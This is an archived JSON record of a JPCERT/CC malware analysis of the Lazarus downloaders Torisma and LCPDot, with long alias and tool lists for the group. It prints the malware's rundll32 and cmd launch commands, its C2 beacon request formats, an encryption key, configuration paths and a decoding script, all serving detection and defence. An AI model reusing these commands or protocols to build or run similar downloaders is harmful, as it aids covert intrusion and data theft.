{
	"id": "73193574-ecc7-4882-9ff6-f7586bdbabe1",
	"created_at": "2026-04-06T00:13:20.698101Z",
	"updated_at": "2026-04-10T03:38:20.432472Z",
	"deleted_at": null,
	"sha1_hash": "e5ed1904b071cf600e4184600ea00146fc87fc2e",
	"title": "Operation Dream Job by Lazarus - JPCERT/CC Eyes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 596033,
	"plain_text": "Operation Dream Job by Lazarus - JPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2021-01-25 · Archived: 2026-04-05 15:57:51 UTC\r\nLazarus (also known as Hidden Cobra) is known to use various kinds of malware in its attack operations, and we have introduced some of them in our past articles. In this article, we present two more: Torisma and LCPDot.\r\nTorisma overview\r\nTorisma downloads and executes modules from external servers, and its infection spreads via malicious Word files [1]. The Torisma samples that JPCERT/CC has analysed are DLL files and are executed as an argument of rundll32.exe. Below is an example of a command argument for Torisma execution.\r\n\"C:\\Windows\\System32\\rundll32.exe\" C:\\ProgramData\\USOShared\\usosqlite3.dat,sqlite3_create_functionex\r\nWhen a key to decode internal data (mssqlite3_server_management) is given to the export function (\"sqlite3_create_functionex\" in this example), the malware performs suspicious functions. Torisma's configuration, communication protocol and modules are described in the following sections.\r\nTorisma configuration\r\nTorisma loads C2 servers and other information from a separate file, which is located in the following directory. (Some samples do not load configuration files.)\r\n%LOCALAPPDATA%.IdentityService\\AccountStore.bak\r\nThe configuration file has a 12-byte signature (0x98 0x11 0x1A 0x45 0x90 0x78 0xBA 0xF9 0x4E 0xD6 0x8F 0xEE) at the beginning. File contents will be loaded upon execution only if the signature matches the above value. Figure 1 is a sample of the configuration.\r\nhttps://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html\r\nPage 1 of 9\n\nFigure 1: Torisma configuration sample\r\nThe configuration file contains C2 server and other information.
(See Appendix A for details.)\r\nTorisma communication with C2 servers\r\nBelow is an example of an HTTP POST request that Torisma sends at the beginning of the communication.\r\nPOST /[PATH] HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nConnection: Keep-Alive\r\nContent-Length: [Length]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0\r\nHost: [Server]\r\nCache-Control: no-cache\r\nACTION=VIEW\u0026PAGE=[MAC Address]\u0026CODE=[random numeric]\u0026CACHE=[Base64 data]REQUEST=[random numeric]\r\n[Base64 data] contains a C2 server URL, MAC address and other information. (Please see Appendix B for the details of the data format.) If the following input is received as a response to the HTTP POST request, Torisma sends the second request.\r\nYour request has been accepted. ClientID: {f9102bc8a7d81ef01ba}\r\nThis is the second HTTP POST request.\r\nPOST /[PATH] HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nConnection: Keep-Alive\r\nContent-Length: [Length]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0\r\nHost: [Server]\r\nCache-Control: no-cache\r\nACTION=PREVPAGE\u0026CODE=C[random numeric]\u0026RES=[random numeric]\r\nAs a response to this request, an encrypted and Base64-encoded module (\"+\" is replaced by a space) is downloaded. Torisma uses the VEST-32 algorithm [2] for encryption. In the samples confirmed by JPCERT/CC, the encryption key was identical: \"ff7172d9c888b7a88a7d77372112d772\" (as in Figure 2). This encryption algorithm is also used for encrypting C2 server information in the configuration.\r\nFigure 2: Torisma's VEST-32 encryption key\r\nTorisma modules\r\nTorisma performs various functions by downloading and executing additional modules.
They are provided in the executable code format as in Figure 3, not PE format.\r\nFigure 3: Torisma module code sample\r\nJPCERT/CC has confirmed a couple of module functions actually used in attacks:\r\nSend information of infected hosts\r\nExecute specific files\r\nLCPDot overview\r\nLCPDot is also a downloader similar to Torisma. In some samples, the code was obfuscated by VMProtect. It is assumed that the attacker used LCPDot for lateral movement on a victim's network infected with Torisma. Samples analysed by JPCERT/CC perform suspicious behaviour with the following options added upon execution:\r\n-p: RC4 encryption key\r\n-s: Base64-encoded C2 server information\r\nBelow is an example of an execution command with a specific option.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c C:\\ProgramData\\Adobe\\Adobe.bin -p 0x53A4C60B\r\nThe following sections describe LCPDot configuration and communication protocol.\r\nLCPDot communication with C2 servers\r\nBelow is an example of an HTTP POST request that LCPDot sends at the beginning of the communication.\r\nPOST /[URL] HTTP/1.1\r\nAccept: text/html\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: SESSID=[Base64 data]\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: [Host]\r\nContent-Length: [Size]\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie=Enable\u0026CookieV=[random numeric]\u0026Cookie_Time=64\r\n[Base64 data] contains the encoded value of \"[ID]-101010\".
([ID] is a unique value for the entire communication.) If the following input is received as a response to this request, LCPDot sends the second request.\r\nAuthentication Success\r\nThis is the second HTTP POST request.\r\nGET /[URL] HTTP/1.1\r\nAccept: text/html\r\nAccept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: SESSID=[Base64 data]\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHost: [Host]\r\nContent-Length: [Size]\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n[Base64 data] contains the encoded value of \"[ID]-101011\". As a response to this request, an RC4-encoded module is downloaded. The encryption key is the SHA1 hash value of the value specified either in the sample or in the option \"-p\" upon execution.\r\nThe function of the module is unknown as no module could be obtained during the analysis. It was at least confirmed that it includes functions to disguise the data as a GIF image (Figure 4).\r\nFigure 4: Code to disguise data that LCPDot sends as GIF image\r\nLCPDot configuration\r\nLCPDot contains its configuration in itself. (In some samples, the configuration needs to be specified with the option \"-s\" when executed.) C2 server information is encoded with XOR+Base64. Below is an example of a Python script to decode the C2 server information.\r\nimport base64\r\n# encode_data: the Base64-encoded C2 server information (embedded in the sample or passed with \"-s\")\r\ndecoded_base64_data = base64.b64decode(encode_data)\r\n# XOR each byte with 0x25, then subtract 0x7a (kept within one byte)\r\nprint(''.join(chr(((b ^ 0x25) - 0x7a) \u0026 0xFF) for b in decoded_base64_data))\r\nLCPDot saves configuration data including C2 servers in a separate file. There are some patterns in the location of the file, such as:\r\n%TEMP%\\..\\Thumbnails.db\r\n%TEMP%\\..\\ntuser.log1\r\nThe configuration data is RC4-encrypted. The encryption key is the SHA1 hash value of the value specified either in the sample or in option \"-p\" upon execution.
Figure 5 is an example of decoded configuration.\r\nFigure 5: Example of decoded configuration\r\nIn closing\r\nThis article provided details of malware that Lazarus group uses during and after the intrusion. To date, this group has used various kinds of malware besides the two covered in this article. We will provide an update when we find new types of malware.\r\nC2 servers connected to the samples described in this article are listed in Appendix C. Please make sure that none of your devices is communicating with them.\r\nShusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nReference\r\n[1] McAfee: Operation North Star: Behind The Scenes\r\nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/\r\n[2] ECRYPT: VEST\r\nhttps://www.ecrypt.eu.org/stream/vest.html\r\nAppendix A: Torisma configuration\r\nTable A: List of configuration\r\nOffset | Description | Remarks\r\n0x000 | Signature | 0x98 0x11 0x1A 0x45 0x90 0x78 0xBA 0xF9 0x4E 0xD6 0x8F 0xEE\r\n0x00d | Time |\r\n0x011 | - |\r\n0x015 | Drive check time |\r\n0x01D | Sleep time |\r\n0x021 | C2 server * 6 | Size 0x202 (VEST-32 encrypted)\r\n0xC2D | C2 server size * 6 | Size 0x4\r\n0xC45 | Disc drive flag | Whether to count the number of disc drives\r\n0xC49 | WTSActive flag | Whether to count the number of logon users\r\n0xC4D | ID |\r\nAppendix B: Data sent by Torisma\r\nTable B: Format of data sent\r\nOffset | Length | Contents\r\n0x000 | 0x400 | URL\r\n0x400 | 0x18 | MAC address of infected host\r\n0x418 | 0xC | Random string\r\n0x424 | 8 | ID\r\n0x434 | 4 | Numeric value\r\n0x438 | 4 | \"2\"\r\nAppendix C: C2
servers\r\nAppendix D: Malware hash value\r\nSource: https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html"
	],
	"report_names": [
		"Lazarus_malware2.html"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434400,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e5ed1904b071cf600e4184600ea00146fc87fc2e.pdf",
		"text": "https://archive.orkl.eu/e5ed1904b071cf600e4184600ea00146fc87fc2e.txt",
		"img": "https://archive.orkl.eu/e5ed1904b071cf600e4184600ea00146fc87fc2e.jpg"
	}
}